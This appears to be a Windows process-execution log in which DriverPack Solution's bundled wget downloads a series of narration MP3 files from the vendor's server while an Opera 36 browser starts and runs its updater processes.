C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-15.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_16043.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-9.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_27460.log"

C:\Program Files (x86)\Opera\launcher.exe

"C:\Program Files (x86)\Opera\launcher.exe" --start-maximized

C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe

"C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe" --start-maximized --ran-launcher

C:\Program Files (x86)\Opera\36.0.2130.80\opera_crashreporter.exe

"C:\Program Files (x86)\Opera\36.0.2130.80\opera_crashreporter.exe" --start-maximized --ran-launcher --crash-reporter-parent-id=2544

C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe

"C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --enable-features=DownloadResumption --lang=en-US --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=on --crash-reporter-pid=1132 --device-scale-factor=1 --num-raster-threads=4 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="2544.1.144803380\197845282"

C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe

"C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --enable-features=DownloadResumption --lang=en-US --extension-process --enable-webrtc-hw-h264-encoding --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=on --crash-reporter-pid=1132 --device-scale-factor=1 --num-raster-threads=4 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="2544.2.1792320968\980087951"

C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe

"C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --enable-features=DownloadResumption --lang=en-US --extension-process --enable-webrtc-hw-h264-encoding --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=on --crash-reporter-pid=1132 --device-scale-factor=1 --num-raster-threads=4 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="2544.3.596053878\254894736"

C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe

"C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe" --type=utility --channel="2544.4.1148848936\1487424808" --lang=en-US --no-sandbox --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=on --crash-reporter-pid=1132

C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe

"C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe" --type=utility --channel="2544.5.866145012\438880135" --lang=en-US --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=on --crash-reporter-pid=1132 --ignored=" --type=renderer "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-8.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_94027.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_94027.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-7.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_71047.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_71047.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_75814.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_75814.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-7.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_71047.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_75814.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-8.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_94027.log"

C:\Program Files (x86)\Opera\36.0.2130.80\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\36.0.2130.80\opera_autoupdate.exe" --host=https://autoupdate.geo.opera.com/ --pipeid=oauc_pipedbff851fa759ccb33e726f883720ae50 --version=36.0.2130.80 --edition --lang=en-US --producttype --requesttype=start --operadir="C:\Program Files (x86)\Opera\36.0.2130.80" --installdir="C:\Program Files (x86)\Opera" --profile="C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable" --installationdatadir="C:\Program Files (x86)\Opera" --firstrunver=36.0.2130.80 --firstrunts=1714755097 --currentstats="C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp2544.6.494776672"

C:\Windows\system32\taskeng.exe

taskeng.exe {B4CB6B60-8BD4-4842-971A-D64A26B3A786} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_43269.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_43269.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_19910.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_19910.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_61882.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_61882.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_89215.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_89215.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_73558.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_73558.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-3562961021381425168-83846005815114320331398629041637220032-17018095231417584494"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_61882.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_89215.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_73558.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_43269.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_19910.log"

C:\Program Files (x86)\Opera\launcher.exe

"C:\Program Files (x86)\Opera\launcher.exe" --scheduledautoupdate --autoupdaterequesttype=start

C:\Windows\TEMP\opera autoupdate\installer.exe

"C:\Windows\TEMP\opera autoupdate\installer.exe" --version

C:\Program Files (x86)\Opera\36.0.2130.80\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\36.0.2130.80\opera_autoupdate.exe" --host --pipeid=oauc_task_pipee59e7323ed1cebd78082538c8b9cbe70 --version=36.0.2130.80 --lang=en --producttype --requesttype=start --downloaddir="C:\Windows\TEMP\opera autoupdate" --operadir="C:\Program Files (x86)\Opera\36.0.2130.80" --installdir="C:\Program Files (x86)\Opera" --profile="C:\Windows\TEMP\opera autoupdate" --nometrics --scheduledtask

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-13.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_37492.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_37492.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-12.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_41956.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_41956.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-10.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_68961.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_68961.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-9.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_76067.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_76067.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-8.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_41074.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_41074.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-12.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_41956.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-13.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_37492.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-10.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_68961.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-9.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_76067.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-8.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_41074.log"

C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe

"C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --enable-features=DownloadResumption --lang=en-US --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=on --crash-reporter-pid=1132 --device-scale-factor=1 --num-raster-threads=4 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="2544.7.112733089\1025003168"

C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe

"C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe" --type=utility --channel="2544.8.1112309576\879153440" --lang=en-US --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=on --crash-reporter-pid=1132 --ignored=" --type=renderer "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-7.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_25293.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_25293.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_9792.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_9792.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-7.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_25293.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-false-positive-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_9792.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_28259.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_28259.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_11214.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_11214.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_76282.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_76282.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_6982.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_6982.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_79126.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_79126.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_28259.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_11214.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_6982.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_76282.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_79126.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-7.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_72839.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_72839.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-drivers-7.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_72839.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_86566.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_86566.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_4901.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_4901.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_68590.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_68590.txt""

C:\Windows\SysWOW64\cmd.exe

